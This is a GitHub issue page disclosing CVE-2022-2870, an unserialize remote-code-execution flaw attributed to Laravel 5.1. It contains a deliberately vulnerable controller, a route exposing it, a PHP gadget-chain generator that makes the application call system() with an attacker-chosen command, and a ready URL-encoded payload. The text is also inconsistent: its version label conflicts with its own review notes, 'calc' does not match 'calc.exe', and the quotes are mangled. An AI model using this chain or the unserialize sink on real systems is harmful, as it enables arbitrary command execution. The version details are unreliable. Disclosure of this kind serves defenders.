Headline
CVE-2022-2870: Laravel5.1 Unserialize RCE · Issue #2 · beicheng-maker/vulns
A vulnerability was found in Laravel 5.1 and classified as problematic. It affects an unspecified part of the code. Manipulating the input leads to deserialization of untrusted data. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The identifier VDB-206501 was assigned to this vulnerability.
Laravel 5.1 POP Chain
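# Lab setup: create a Laravel project constrained to the 5.1.x release line.
# The version constraint is quoted with plain ASCII quotes so the shell passes
# it through as a single argument and does not glob-expand the "*".
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"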
Add a controller, UsersController, in app/Http/Controllers/UsersController.php:
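<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;

class UsersController extends Controller
{
    /**
     * Deliberately vulnerable demo endpoint: deserializes the "cmd" request field.
     *
     * SECURITY: the value passed to unserialize() comes straight from the HTTP
     * request. Deserializing attacker-controlled data lets the sender instantiate
     * any class the application can autoload, with property values of their
     * choosing, and magic methods such as __wakeup()/__destruct() then run on
     * those objects. That sink, not any single framework class, is the root
     * cause of the issue described on this page.
     *
     * Production code should not accept serialized PHP objects from clients at
     * all; exchange plain data (for example JSON via json_decode()) instead.
     * On PHP 7.0+ unserialize() also accepts ['allowed_classes' => false],
     * which prevents object instantiation, but it is a hardening measure and
     * not a substitute for removing the sink.
     *
     * @param  Request  $request  Incoming request; its "cmd" input is untrusted.
     * @return void  Nothing is returned; the prompt text is written with echo.
     */
    public function store(Request $request)
    {
        echo "Please post cmd to unserialize";

        // Client-supplied value, used without any validation.
        $payload = $request->input("cmd");

        // FLAGGED, intentionally not replaced: object-injection sink kept so the
        // page's reproduction case still demonstrates the vulnerable pattern.
        unserialize($payload);
    }
}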
routes/web.php
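// Lab-only route: maps POST /test to UsersController::store(), which passes the
// request's "cmd" field to unserialize(). Never register this outside an isolated test setup.
Route::post('/test', [\App\Http\Controllers\UsersController::class, 'store']);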
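<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

// Lab-only route: maps POST /test to UsersController::store(), which passes the
// request's "cmd" field to unserialize(). Exposing it makes the application
// deserialize whatever a remote client sends, so it must never be registered
// outside an isolated test setup.
Route::post('/test', [\App\Http\Controllers\UsersController::class, 'store']);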
EXP
<?php
// Proof-of-concept payload generator, reproduced as published in the issue.
//
// What the listing does: it declares three classes under the namespaces
// Illuminate\Auth, Illuminate\View and SebastianBergmann\RecursionContext,
// fills their properties in the constructors, nests the objects
// (Context -> InvokableComponentVariable -> RequestGuard) and prints the
// URL-encoded result of serialize(). Only class names and property values end
// up in that string; presumably the names mirror classes that ship with the
// target application's dependencies, so the real implementations are the ones
// that run when the application deserializes it.
//
// Defender notes:
// - The object graph is inert on its own. It only matters where an application
//   passes client-controlled data to unserialize(), as the demo controller on
//   this page does; remove or constrain that call rather than chasing
//   individual gadget classes.
// - Serialized PHP objects in a request parameter are recognisable by the
//   `O:<length>:"<ClassName>"` marker (URL-encoded as `O%3A...%3A%22`), which
//   is a practical indicator for request logging and WAF rules.
// - NOTE(review): routes/web.php and Illuminate\View\InvokableComponentVariable
//   do not, as far as I know, exist in the Laravel 5.1 tree; confirm the
//   affected version against the framework actually installed before using the
//   "5.1" label for triage.
// - NOTE(review): the quote characters in this listing were altered by the
//   page's formatting; it is left exactly as published.
namespace Illuminate\Auth; class RequestGuard{ protected $provider; protected $callback; protected $request; public function __construct(){ $this->callback = 'call_user_func’; $this->request = 'system’; $this->provider = 'calc’; } }
namespace Illuminate\View; use Illuminate\Auth\RequestGuard; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new RequestGuard,’user’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>
O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D